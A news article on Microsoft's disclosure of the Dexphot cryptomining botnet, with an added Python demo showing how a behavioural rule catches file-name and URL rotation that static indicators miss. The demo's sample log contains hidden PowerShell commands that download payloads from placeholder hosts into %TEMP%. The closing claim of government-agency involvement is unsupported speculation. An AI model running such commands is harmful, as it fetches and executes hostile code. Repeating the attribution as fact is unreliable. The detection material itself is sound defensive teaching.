Microsoft's antivirus and malware division has alerted the cybersecurity sector to the threat posed by a cryptocurrency-mining botnet that, at its peak last June, was detected on up to 80,000 computers worldwide.
The malware, apparently created in October 2018 and named Dexphot, was disclosed by Microsoft engineers in a report published yesterday on the company's website, which details how this new threat operates.
To go unnoticed on infected systems, Dexphot relies on polymorphism, fileless execution and persistence mechanisms that bring it back after a reboot.
It does not spread on its own to reach new machines. Instead it arrives bundled inside a second piece of malware, ICLoader, which is in turn packaged with other software, such as 'pirated' programs.
The only component that is ever written to the disk of the attacked machine is the Dexphot installer itself, and even that stays there only for a very short time.
From then on the malware hides inside legitimate system processes, doing its work with programs that are already part of Windows, all of which makes it hard to detect with classic antivirus software.
Dexphot's main concealment technique, however, is polymorphism: it changes both the URLs and the file names it uses every 20 to 30 minutes, so indicators collected from one infection are stale almost immediately, and any trace of the malware that survives a clean-up can easily reinfect the machine.
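As an added example (not code from the article or from Microsoft's report), the following Python script shows why name and URL rotation on a 20-30 minute cycle defeats indicator matching, and what a detection rule has to key on instead. The process-creation log, host names, file names and URLs are constructed for the demo; the process and path patterns used in the behavioural rule are illustrative choices made here, not indicators taken from the report.

```python
"""
Constructed demo: static IOC matching versus a behavioural rule against
an attacker who rotates file names and download URLs every 20-30 minutes.
Nothing below is a real Dexphot indicator; every name, path, host and URL
is invented for the example.
"""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed process-creation log, one event per line:
#   <ISO timestamp>|<parent image>|<child image>|<command line>
# Four events are the "same" malicious action under fresh names and URLs;
# the other three are benign noise.
SAMPLE_LOG = """\
2019-06-14T10:00:05|explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://cdn-a1.example.net/p1.bin -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\k3d9.exe"
2019-06-14T10:03:11|explorer.exe|powershell.exe|powershell -c "Get-Process | Sort-Object CPU"
2019-06-14T10:25:07|explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://cdn-b7.example.org/x9.bin -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\q8wz.exe"
2019-06-14T10:40:30|services.exe|svchost.exe|svchost.exe -k netsvcs
2019-06-14T10:50:02|explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://dl-c2.example.com/z.bin -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\m1ab.exe"
2019-06-14T11:15:44|explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://cdn-d4.example.net/u2.bin -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\r7cv.exe"
2019-06-14T11:20:00|explorer.exe|powershell.exe|powershell -c "iwr https://updates.example.com/tool.zip -OutFile C:\\Users\\u\\Downloads\\tool.zip"
"""

# Static indicators an analyst might extract from the first sample seen
# (hypothetical values matching the first log line above).
FIRST_SEEN_IOCS = {"k3d9.exe", "http://cdn-a1.example.net/p1.bin"}


@dataclass(frozen=True)
class Event:
    ts: datetime
    parent: str
    child: str
    cmdline: str


def parse_events(text: str) -> list[Event]:
    """Parse the pipe-separated log; the command line may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, child, cmd = line.split("|", 3)
        events.append(Event(datetime.fromisoformat(ts), parent, child, cmd))
    return events


def ioc_match(events: list[Event], iocs: set[str]) -> list[Event]:
    """Exact substring match on file names / URLs: only the first sample hits."""
    return [e for e in events if any(ioc in e.cmdline for ioc in iocs)]


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Illustrative path pattern: an executable dropped straight into %TEMP%.
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"']+\.exe\b", re.IGNORECASE)


def behaviour_match(events: list[Event]) -> list[Event]:
    """Behavioural rule that ignores the rotating values entirely:
    PowerShell fetching a URL and writing an .exe into %TEMP%."""
    return [
        e for e in events
        if e.child.lower() == "powershell.exe"
        and URL_RE.search(e.cmdline)
        and TEMP_EXE_RE.search(e.cmdline)
    ]


def rotated_names(hits: list[Event]) -> tuple[set[str], set[str]]:
    """Distinct dropped file names and download URLs across the hits."""
    names = {TEMP_EXE_RE.search(e.cmdline).group(0).rsplit("\\", 1)[-1] for e in hits}
    urls = {URL_RE.search(e.cmdline).group(0) for e in hits}
    return names, urls


def rotation_minutes(hits: list[Event]) -> list[int]:
    """Whole minutes between consecutive hits, to compare with the 20-30
    minute churn the report describes."""
    ts = sorted(e.ts for e in hits)
    return [int((b - a).total_seconds() // 60) for a, b in zip(ts, ts[1:])]


if __name__ == "__main__":
    events = parse_events(SAMPLE_LOG)
    hits = behaviour_match(events)
    names, urls = rotated_names(hits)
    print("IOC hits:", len(ioc_match(events, FIRST_SEEN_IOCS)))
    print("behaviour hits:", len(hits))
    print("distinct file names:", len(names), "distinct URLs:", len(urls))
    print("minutes between hits:", rotation_minutes(hits))
```

The IOC rule catches one of the four malicious events and the behavioural rule catches all four with no hits on the benign lines, which is the practical consequence of the rotation: block lists built from yesterday's file names and URLs are worthless against this family, while the shape of the action (which binary, what it fetches, where it writes) stays constant and is what a detection should key on.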
This level of sophistication points to a link between the malware and government cybersecurity agencies, which would turn to mining the Monero cryptocurrency as a source of funding, since the currency's emphasis on privacy makes it very difficult to reconstruct the movement of the funds generated.